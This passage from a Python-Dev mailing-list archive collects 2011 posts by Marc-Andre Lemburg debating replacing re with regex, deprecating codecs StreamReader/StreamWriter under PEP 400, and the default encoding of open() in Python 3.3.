even with UCS-4 storage, you can still have surrogates in your
Python Unicode string. As with many things, it is important

Re: [Python-Dev] Should we move to replace re with regex?

2011-08-26 Thread M.-A. Lemburg
Guido van Rossum wrote:
 I just made a pass of all the Unicode-related bugs filed by Tom
 Christiansen, and found that in several, the response was this is
 fixed in the regex module [by Matthew Barnett]. I started replying
 that I thought that we should fix the bugs in the re module (i.e.,
 really in _sre.c) but on second thought I wonder if maybe regex is
 mature enough to replace re in Python 3.3. It would mean that we won't
 fix any of these bugs in earlier Python versions, but I could live
 with that.
 
 However, I don't know much about regex -- how compatible is it, how
 fast is it (including extreme cases where the backtracking goes
 crazy), how bug-free is it, and so on. Plus, how much work would it be
 to actually incorporate it into CPython as a complete drop-in
 replacement of the re package (such that nobody needs to change their
 imports or the flags they pass to the re module).
 
 We'd also probably have to train some core developers to be familiar
 enough with the code to maintain and evolve it -- I assume we can't
 just volunteer Matthew to do so forever... :-)
 
 What's the alternative? Is adding the requested bug fixes and new
 features to _sre.c really that hard?

Why not simply add the new lib, see whether it works out and
then decide which path to follow.

We've done that with the old regex lib. It took a few years
and releases to have people port their applications to the
then new re module and syntax, but in the end it worked.

With a new regex library there are likely going to be quite
a few subtle differences between re and regex - even if it's
just doing things in a more Unicode compatible way.

I don't think anyone can actually list all the differences given
the complex nature of regular expressions, so people will
likely need a few years and releases to get used it before
a switch can be made.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Aug 27 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/

2011-10-04: PyCon DE 2011, Leipzig, Germany38 days to go

::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Should we move to replace re with regex?

2011-08-26 Thread M.-A. Lemburg
Guido van Rossum wrote:
 On Fri, Aug 26, 2011 at 3:09 PM, M.-A. Lemburg m...@egenix.com wrote:
 Guido van Rossum wrote:
 I just made a pass of all the Unicode-related bugs filed by Tom
 Christiansen, and found that in several, the response was this is
 fixed in the regex module [by Matthew Barnett]. I started replying
 that I thought that we should fix the bugs in the re module (i.e.,
 really in _sre.c) but on second thought I wonder if maybe regex is
 mature enough to replace re in Python 3.3. It would mean that we won't
 fix any of these bugs in earlier Python versions, but I could live
 with that.

 However, I don't know much about regex -- how compatible is it, how
 fast is it (including extreme cases where the backtracking goes
 crazy), how bug-free is it, and so on. Plus, how much work would it be
 to actually incorporate it into CPython as a complete drop-in
 replacement of the re package (such that nobody needs to change their
 imports or the flags they pass to the re module).

 We'd also probably have to train some core developers to be familiar
 enough with the code to maintain and evolve it -- I assume we can't
 just volunteer Matthew to do so forever... :-)

 What's the alternative? Is adding the requested bug fixes and new
 features to _sre.c really that hard?

 Why not simply add the new lib, see whether it works out and
 then decide which path to follow.

 We've done that with the old regex lib. It took a few years
 and releases to have people port their applications to the
 then new re module and syntax, but in the end it worked.

 With a new regex library there are likely going to be quite
 a few subtle differences between re and regex - even if it's
 just doing things in a more Unicode compatible way.

 I don't think anyone can actually list all the differences given
 the complex nature of regular expressions, so people will
 likely need a few years and releases to get used it before
 a switch can be made.
 
 I can't say I liked how that transition was handled last time around.
 I really don't want to have to tell people Oh, that bug is fixed but
 you have to use regex instead of re and then a few years later have
 to tell them Oh, we're deprecating regex, you should just use re.

No, you tell them: If you want Unicode 6 semantics, use regex,
if you're fine with Unicode 2.0/3.0 semantics, use re. After all,
it's not like re suddenly stopped working :-)

 I'm really hoping someone has more actual technical understanding of
 re vs. regex and can give us some facts about the differences, rather
 than, frankly, FUD.

The good part is that it's based on the re code, the FUD comes
from the fact that the new lib is 380kB larger than the old one
and that's not even counting the generated 500kB of lookup
tables.

If no one steps up to do a review or analysis, I think the
only practical way to test the lib is to give it a prominent
chance to prove itself.

The other aspect is maintenance.

Perhaps we could have a summer of code student do a review and
analysis to get familiar with the code and then have at least
two developers know the code well enough to support it for
a while.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Aug 27 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/

2011-10-04: PyCon DE 2011, Leipzig, Germany38 days to go

::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Status of the PEP 400? (deprecate codecs.StreamReader/StreamWriter)

2011-07-29 Thread M.-A. Lemburg
Victor Stinner wrote:
 Le 28/07/2011 11:28, Victor Stinner a écrit :
 Please do keep the original implementation
 around (e.g. renamed to codecs.open_stream()), though, so that it's
 still possible to get easy-to-use access to codec StreamReader/Writers.

 I will add your alternative to the PEP (except if you would like to do
 that yourself?). If I understood correctly, you propose to:

 * rename codecs.open() to codecs.open_stream()
 * change codecs.open() to reuse open() (and so io.TextIOWrapper)

 (and don't deprecate anything)
 
 I added your proposal to the PEP as an Alternative Approache.

Thanks.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Jul 29 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Status of the PEP 400? (deprecate codecs.StreamReader/StreamWriter)

2011-07-28 Thread M.-A. Lemburg
Victor Stinner wrote:
 Hi,
 
 Three weeks ago, I posted a draft on my PEP on this mailing list. I
 tried to include all remarks you made, and the PEP is now online:
 
http://www.python.org/dev/peps/pep-0400/
 
 It's now unclear to me if the PEP will be accepted or rejected. I don't
 know what to do to move forward.

The PEP still compares apples and oranges, issues and features,
and doesn't cover the fact that it is proposing to not just deprecate
a feature, but a part of a design concept which will then no longer
be available in Python.

I'm still -1 on that part of the PEP.

As I mentioned before, having
codecs.open() changed to be a wrapper around io.open() in Python 3.3,
should be investigated. If it doesn't cause too much trouble, this
would be a good idea. Please do keep the original implementation
around (e.g. renamed to codecs.open_stream()), though, so that it's
still possible to get easy-to-use access to codec StreamReader/Writers.

Thanks,
-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Jul 28 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Draft PEP: Deprecate codecs.StreamReader and codecs.StreamWriter

2011-07-07 Thread M.-A. Lemburg
Victor Stinner wrote:
 Hi,
 
 Last may, I proposed to deprecate open() function, StreamWriter and
 StreamReader classes of the codecs module. I accepted to keep open()
 after the discussion on python-dev. Here is a more complete proposition
 as a PEP. It is a draft and I expect a lot of comments :)

The PEP's arguments for deprecating two essential codec design
components are very one sided, by comparing issues to features.

Please add all the comments I've made on the subject to the PEP.
The most important one missing is the fact and major difference
that TextIOWrapper does not work on a per codec basis, but
only on a per stream basis.

By removing the StreamReader and StreamWriter API parts of the
codec design, you essentially make it impossible to add
per codec variations and optimizations that require full access
to the stream interface.

A mentioned before, many improvements are possible and lots of those
can build on TextIOWrapper and the incremental codec parts.

That said, I'm not really up for a longer discussion on this. We've
already had the discussion and decided against removing those
parts of the codec API.

Redirecting codecs.open() to open() should be investigated.

For the issues you mention in the PEP, please open tickets
or add ticket references to the PEP.

Thanks,
-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Jul 07 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/


 Victor
 
 ---
 
 PEP: xxx
 Title: Deprecate codecs.StreamReader and codecs.StreamWriter
 Version: $Revision$
 Last-Modified: $Date$
 Author: Victor Stinner
 Status: Draft
 Type: Standards Track
 Content-Type: text/x-rst
 Created: 28-May-2011
 Python-Version: 3.3
 
 
 Abstract
 
 
 io.TextIOWrapper and codecs.StreamReaderWriter offer the same API
 [#f1]_. TextIOWrapper has more features and is faster than
 StreamReaderWriter. Duplicate code means that bugs should be fixed
 twice and that we may have subtle differences between the two
 implementations.
 
 The codecs modules was introduced in Python 2.0, see the PEP 100. The
 io module was introduced in Python 2.6 and 3.0 (see the PEP 3116), and
 reimplemented in C in Python 2.7 and 3.1.
 
 
 Motivation
 ==
 
 When the Python I/O model was updated for 3.0, the concept of a
 stream-with-known-encoding was introduced in the form of
 io.TextIOWrapper. As this class is critical to the performance of
 text-based I/O in Python 3, this module has an optimised C version
 which is used by CPython by default. Many corner cases in handling
 buffering, stateful codecs and universal newlines have been dealt with
 since the release of Python 3.0.
 
 This new interface overlaps heavily with the legacy
 codecs.StreamReader, codecs.StreamWriter and codecs.StreamReaderWriter
 interfaces that were part of the original codec interface design in
 PEP 100. These interfaces are organised around the principle of an
 encoding with an associated stream (i.e. the reverse of arrangement in
 the io module), so the original PEP 100 design required that codec
 writers provide appropriate StreamReader and StreamWriter
 implementations in addition to the core codec encode() and decode()
 methods. This places a heavy burden on codec authors providing these
 specialised implementations to correctly handle many of the corner
 cases that have now been dealt with by io.TextIOWrapper. While deeper
 integration between the codec and the stream allows for additional
 optimisations in theory, these optimisations have in practice either
 not been carried out and else the associated code duplication means
 that the corner cases that have been fixed in io.TextIOWrapper are
 still not handled correctly in the various StreamReader and
 StreamWriter implementations.
 
 Accordingly, this PEP proposes that:
 
 * codecs.open() be updated to delegate to the builtin open() in Python
   3.3;
 * the legacy codecs.Stream* interfaces, including the streamreader and
   streamwriter attributes of codecs.CodecInfo be deprecated in Python
   3.3 and removed in Python 3.4.
 
 
 Rationale
 =
 
 StreamReader and StreamWriter issues
 
 
  * StreamReader is unable to translate newlines.
  * StreamReaderWriter handles reads using StreamReader and writes
using StreamWriter. These two classes may be inconsistent. To stay
consistent, flush() must be 

Re: [Python-Dev] open(): set the default encoding to 'utf-8' in Python 3.3?

2011-06-29 Thread M.-A. Lemburg
Victor Stinner wrote:
 Le mardi 28 juin 2011 à 16:02 +0200, M.-A. Lemburg a écrit :
 How about a more radical change: have open() in Py3 default to
 opening the file in binary mode, if no encoding is given (even
 if the mode doesn't include 'b') ?
 
 I tried your suggested change: Python doesn't start.

No surprise there: it's an incompatible change, but one that undoes
a wart introduced in the Py3 transition. Guessing encodings should
be avoided whenever possible.

 sysconfig uses the implicit locale encoding to read sysconfig.cfg, the
 Makefile and pyconfig.h. I think that it is correct to use the locale
 encoding for Makefile and pyconfig.h, but maybe not for sysconfig.cfg.
 
 Python require more changes just to run make. I was able to run make
 by using encoding='utf-8' in various functions (of distutils and
 setup.py). I didn't try the test suite, I expect too many failures.

This demonstrates that Python's stdlib is still not being explicit
about the encoding issues. I suppose that things just happen to work
because we mostly use ASCII files for configuration and setup.

 --
 
 Then I tried my suggestion (use utf-8 by default): Python starts
 correctly, I can build it (run make) and... the full test suite pass
 without any change. (I'm testing on Linux, my locale encoding is UTF-8.)

I bet it would also with ascii in most cases. Which then just
means that the Python build process and test suite is not a good
test case for choosing a default encoding.

Linux is also a poor test candidate for this, since most user setups
will use UTF-8 as locale encoding. Windows, OTOH, uses all sorts of
code page encodings (usually not UTF-8), so you are likely to hit
the real problem cases a lot easier.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Jun 29 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] open(): set the default encoding to 'utf-8' in Python 3.3?

2011-06-29 Thread M.-A. Lemburg
Victor Stinner wrote:
 Le mercredi 29 juin 2011 à 10:18 +0200, M.-A. Lemburg a écrit :
 Victor Stinner wrote:
 Le mardi 28 juin 2011 à 16:02 +0200, M.-A. Lemburg a écrit :
 How about a more radical change: have open() in Py3 default to
 opening the file in binary mode, if no encoding is given (even
 if the mode doesn't include 'b') ?

 I tried your suggested change: Python doesn't start.

 No surprise there: it's an incompatible change, but one that undoes
 a wart introduced in the Py3 transition. Guessing encodings should
 be avoided whenever possible.
 
 It means that all programs written for Python 3.0, 3.1, 3.2 will stop
 working with the new 3.x version (let say 3.3). Users will have to
 migrate from Python 2 to Python 3.2, and then migration from Python 3.2
 to Python 3.3 :-(

I wasn't suggesting doing this for 3.3, but we may want to start
the usual feature change process to make the change eventually
happen.

 I would prefer a ResourceWarning (emited if the encoding is not
 specified), hidden by default: it doesn't break compatibility, and
 -Werror gives exactly the same behaviour that you expect.

ResourceWarning is the wrong type of warning for this. I'd
suggest to use a UnicodeWarning or perhaps create a new
EncodingWarning instead.

 This demonstrates that Python's stdlib is still not being explicit
 about the encoding issues. I suppose that things just happen to work
 because we mostly use ASCII files for configuration and setup.
 
 I did more tests. I found some mistakes and sometimes the binary mode
 can be used, but most function really expect the locale encoding (it is
 the correct encoding to read-write files). I agree that it would be to
 have an explicit encoding=locale, but make it mandatory is a little
 bit rude.

Again: Using a locale based default encoding will not work out
in the long run. We've had those discussions many times in the
past.

I don't think there's anything bad with having the user require
to set an encoding if he wants to read text. It makes him/her
think twice about the encoding issue, which is good.

And, of course, the stdlib should start using this
explicit-is-better-than-implicit approach as well.

 Then I tried my suggestion (use utf-8 by default): Python starts
 correctly, I can build it (run make) and... the full test suite pass
 without any change. (I'm testing on Linux, my locale encoding is UTF-8.)

 I bet it would also with ascii in most cases. Which then just
 means that the Python build process and test suite is not a good
 test case for choosing a default encoding.

 Linux is also a poor test candidate for this, since most user setups
 will use UTF-8 as locale encoding. Windows, OTOH, uses all sorts of
 code page encodings (usually not UTF-8), so you are likely to hit
 the real problem cases a lot easier.
 
 I also ran the test suite on my patched Python (open uses UTF-8 by
 default) with ASCII locale encoding (LANG=C), the test suite does also
 pass. Many tests uses non-ASCII characters, some of them are skipped if
 the locale encoding is unable to encode the tested text.

Thanks for checking. So the build process and test suite are
indeed not suitable test cases for the problem at hand. With
just ASCII files to decode, Python will simply never fail
to decode the content, regardless of whether you use an ASCII,
UTF-8 or some Windows code page as locale encoding.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Jun 29 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] open(): set the default encoding to 'utf-8' in Python 3.3?

2011-06-28 Thread M.-A. Lemburg
Victor Stinner wrote:
 In Python 2, open() opens the file in binary mode (e.g. file.readline()
 returns a byte string). codecs.open() opens the file in binary mode by
 default, you have to specify an encoding name to open it in text mode.
 
 In Python 3, open() opens the file in text mode by default. (It only
 opens the binary mode if the file mode contains b.) The problem is
 that open() uses the locale encoding if the encoding is not specified,
 which is the case *by default*. The locale encoding can be:
 
  - UTF-8 on Mac OS X, most Linux distributions
  - ISO-8859-1 os some FreeBSD systems
  - ANSI code page on Windows, e.g. cp1252 (close to ISO-8859-1) in
 Western Europe, cp952 in Japan, ...
  - ASCII if the locale is manually set to an empty string or to C, or
 if the environment is empty, or by default on some systems
  - something different depending on the system and user configuration...
 
 If you develop under Mac OS X or Linux, you may have surprises when you
 run your program on Windows on the first non-ASCII character. You may
 not detect the problem if you only write text in english... until
 someone writes the first letter with a diacritic.

How about a more radical change: have open() in Py3 default to
opening the file in binary mode, if no encoding is given (even
if the mode doesn't include 'b') ?

That'll make it compatible to the Py2 world again and avoid
all the encoding guessing.

Making such default encodings depend on the locale has already
failed to work when we first introduced a default encoding in
Py2, so I don't understand why we are repeating the same
mistake again in Py3 (only in a different area).

Note that in Py2, Unix applications often leave out the 'b'
mode, since there's no difference between using it or not.
Only on Windows, you'll see a difference.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Jun 28 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


[Python-Dev] Python language summit on ustream.tv

2011-06-16 Thread M.-A. Lemburg
Dear Python Developers,

for the upcoming language summit at EuroPython, I'd like to
try out whether streaming such meetings would work. I'll setup
a webcam and stream the event live to a private channel on ustream.tv.

These are the details in case you want to watch:

URL: http://www.ustream.tv/channel/python-language-summit
PWD: fpmUtuL4

Date: Sunday, 2011-06-19
Time: 10:00 - 16:00 CEST with breaks

I'm not sure whether I can stream the whole summit, but at least
the morning session should be possible, provided the network
works on that day.

Interaction will likely be a bit difficult in case we have
heated discussions :-), but we'll keep the IRC channel
#python-language-summit on freenode open as well.

Thanks,
-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Jun 16 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/

2011-05-23: Released eGenix mx Base 3.2.0  http://python.egenix.com/
2011-05-25: Released mxODBC 3.1.1  http://python.egenix.com/
2011-06-20: EuroPython 2011, Florence, Italy4 days to go

::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] cpython: Remove some extraneous parentheses and swap the comparison order to

2011-06-07 Thread M.-A. Lemburg
Georg Brandl wrote:
 On 06/07/11 05:20, brett.cannon wrote:
 http://hg.python.org/cpython/rev/fc282e375703
 changeset:   70695:fc282e375703
 user:Brett Cannon br...@python.org
 date:Mon Jun 06 20:20:36 2011 -0700
 summary:
   Remove some extraneous parentheses and swap the comparison order to
 prevent accidental assignment.

 Silences a warning from LLVM/clang 2.9.
 
 Swapping the comparison order here seems a bit inconsistent to me. There are
 lots of others around (e.g. len == 0 in the patch context below). Why is
 this one so special?

 I think that another developer even got told off once for these kinds of
 comparisons.

 I hope the Clang warning is only about the parentheses.

I agree with Georg: if ('u' == typecode) is not well readable,
since you usually put the variable part on the left and the constant
part on the right of an equal comparison.

If clang warns about this, clang needs to be fixed, not our
C code :-)

 Georg
 
 files:
   Modules/arraymodule.c |  2 +-
   1 files changed, 1 insertions(+), 1 deletions(-)


 diff --git a/Modules/arraymodule.c b/Modules/arraymodule.c
 --- a/Modules/arraymodule.c
 +++ b/Modules/arraymodule.c
 @@ -2091,7 +2091,7 @@
  if (len == 0) {
  return PyUnicode_FromFormat(array('%c'), (int)typecode);
  }
 -if ((typecode == 'u'))
 +if ('u' == typecode)
  v = array_tounicode(a, NULL);
  else
  v = array_tolist(a, NULL);
 
 
 
 ___
 Python-Dev mailing list
 Python-Dev@python.org
 http://mail.python.org/mailman/listinfo/python-dev
 Unsubscribe: 
 http://mail.python.org/mailman/options/python-dev/mal%40egenix.com

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Jun 07 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/

2011-05-23: Released eGenix mx Base 3.2.0  http://python.egenix.com/
2011-05-25: Released mxODBC 3.1.1  http://python.egenix.com/
2011-06-20: EuroPython 2011, Florence, Italy   13 days to go

::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Deprecate codecs.open() and StreamWriter/StreamReader

2011-05-27 Thread M.-A. Lemburg
Victor Stinner wrote:
 Le mercredi 25 mai 2011 à 15:43 +0200, M.-A. Lemburg a écrit :
 For UTF-16 it would e.g. make sense to always read data in blocks
 with even sizes, removing the trial-and-error decoding and extra
 buffering currently done by the base classes. For UTF-32, the
 blocks should have size % 4 == 0.

 For UTF-8 (and other variable length encodings) it would make
 sense looking at the end of the (bytes) data read from the
 stream to see whether a complete code point was read or not,
 rather than simply running the decoder on the complete data
 set, only to find that a few bytes at the end are missing.
 
 I think that the readahead algorithm is much more faster than trying to
 avoid partial input, and it's not a problem to have partial input if you
 use an incremental decoder.

Depends on where you're coming from. For non-seekable streams
such as sockets or pipes, readahead is not going to work.

For seekable streams, I agree that readahead is better strategy.

And of course, it also makes sense to use incremental decoders
for these encodings.

 For single character encodings, it would make sense to prefetch
 data in big chunks and skip all the trial and error decoding
 implemented by the base classes to address the above problem
 with variable length encodings.
 
 TextIOWrapper implements this optimization using its readahead
 algorithm.

It does yes, but the above was an optimization specific
to single character encodings, not all encodings and
TextIOWrapper doesn't know anything about specific characteristics
of the underlying encodings (except perhaps a few special
cases).

 That's somewhat unfair: TextIOWrapper is implemented in C,
 whereas the StreamReader/Writer subclasses used by the
 codecs are written in Python.

 A fair comparison would use the Python implementation of
 TextIOWrapper.
 
 Do you mean that you would like to reimplement codecs in C? 

As use of Unicode codecs increases in Python applications,
this would certainly be an approach to consider, yes.

Looking at the current situation, it is better to use
TextIOWrapper as it provides better performance, but since
TextIOWrapper cannot (per desing) provide per-codec optimizations,
this is likely to change with a codec rewrite in C of codecs
that benefit a lot from such specific optimizations.

 It is not
 revelant to compare codecs and _pyio, because codecs reuses
 BufferedReader (of the io module, not of the _pyio module), and io is
 the main I/O module of Python 3.

They both use whatever stream you pass in as parameter,
so your TextIOWrapper benchmark will also use the BufferedReader
of the io module.

The point here is to compare Python to Python, not Python
to C.

 But well, as you want, here is a benchmark comparing:
_pyio.TextIOWrapper(io.open(filename, 'rb'), encoding)
 and 
 codecs.open(filename, encoding)
 
 The only change with my previous bench.py script is the test_io()
 function :
 
 def test_io(test_func, chunk_size):
 with open(FILENAME, 'rb') as buffered:
 f = _pyio.TextIOWrapper(buffered, ENCODING)
 test_file(f, test_func, chunk_size)
 f.close()

Thanks for running those tests.

 (1) Decode Objects/unicodeobject.c (317336 characters) from utf-8
 
 test_io.readline(): 1193.4 ms
 test_codecs.readline(): 1267.9 ms
 - codecs 6% slower than io
 
 test_io.read(1): 21696.4 ms
 test_codecs.read(1): 36027.2 ms
 - codecs 66% slower than io
 
 test_io.read(100): 3080.7 ms
 test_codecs.read(100): 3901.7 ms
 - codecs 27% slower than io

This shows that StreamReader/Writer could benefit quite
a bit from using incremental encoders/decoders.

 test_io.read(): 3991.0 ms
 test_codecs.read(): 1736.9 ms
 - codecs 130% FASTER than io

No surprise here. It's also a very common use case
to read the whole file in one go and the bigger
the file, the more impact this has.

 (2) Decode README (6613 characters) from ascii
 
 test_io.readline(): 678.1 ms
 test_codecs.readline(): 760.5 ms
 - codecs 12% slower than io
 
 test_io.read(1): 13533.2 ms
 test_codecs.read(1): 21900.0 ms
 - codecs 62% slower than io
 
 test_io.read(100): 2663.1 ms
 test_codecs.read(100): 3270.1 ms
 - codecs 23% slower than io
 
 test_io.read(): 6769.1 ms
 test_codecs.read(): 3919.6 ms
 - codecs 73% FASTER than io

See above.

 (3) Decode Lib/test/cjkencodings/gb18030.txt (501 characters) from
 gb18030
 
 test_io.readline(): 38.9 ms
 test_codecs.readline(): 15.1 ms
 - codecs 157% FASTER than io
 
 test_io.read(1): 369.8 ms
 test_codecs.read(1): 302.2 ms
 - codecs 22% FASTER than io
 
 test_io.read(100): 258.2 ms
 test_codecs.read(100): 155.1 ms
 - codecs 67% FASTER than io
 
 test_io.read(): 1803.2 ms
 test_codecs.read(): 1002.9 ms
 - codecs 80% FASTER than io

These results are interesting since gb18030 is a shift
encoding which keeps state in the encoded data stream, so
the strategy chosen by TextIOWrapper doesn't work out that
well.

It hints to what I mentioned above: per codec optimizations
are going to be relevant once

Re: [Python-Dev] Deprecate codecs.open() and StreamWriter/StreamReader

2011-05-27 Thread M.-A. Lemburg
Victor Stinner wrote:
 Le vendredi 27 mai 2011 10:17:29, M.-A. Lemburg a écrit :
 I am still -1 on deprecating the StreamReader/Writer parts of
 the codec APIs. I've given numerous reasons on why these are
 useful, what their intention is, why they were added to Python 1.6.
 
 codecs.open() now uses TextIOWrapper, so there is no good reason to keep 
 StreamReader or StreamWriter. You did not give me any use case where 
 StreamReader or StreamWriter should be used instead of TextIOWrapper. You 
 only 
 listed theorical optimizations.
 
 You have until the release of Python 3.3 to prove that StreamReader and/or 
 StreamWriter can be faster than TextIOWrapper. If you can prove it using a 
 patch and a benchmark, I will be ok to revert my commit.

Victor, please revert the change. It has *not* been approved !

If we'd go by your reasoning for deprecating and eventually
removing parts of the stdlib or Python's subsystems, we'll end
up with a barebone version of Python. That's not what we want
and it's not what our users want.

I have tried to explain the design decisions and reasons for
those codec APIs at great length. You've pretty much used up
my patience. If you are not going to revert the patch, I will.

 Since such a deprecation would change an important documented API,
 please write a PEP outlining your reasoning, including my comments,
 use cases and possibilities for optimizations.
 
 Ok, I will write on a PEP explaining why StreamReader and StreamWriter are 
 deprecated.

Wrong order: first write a PEP, then discuss, then get approval,
then patch.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, May 27 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/

2011-05-23: Released eGenix mx Base 3.2.0  http://python.egenix.com/
2011-05-25: Released mxODBC 3.1.1  http://python.egenix.com/
2011-06-20: EuroPython 2011, Florence, Italy   24 days to go

::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
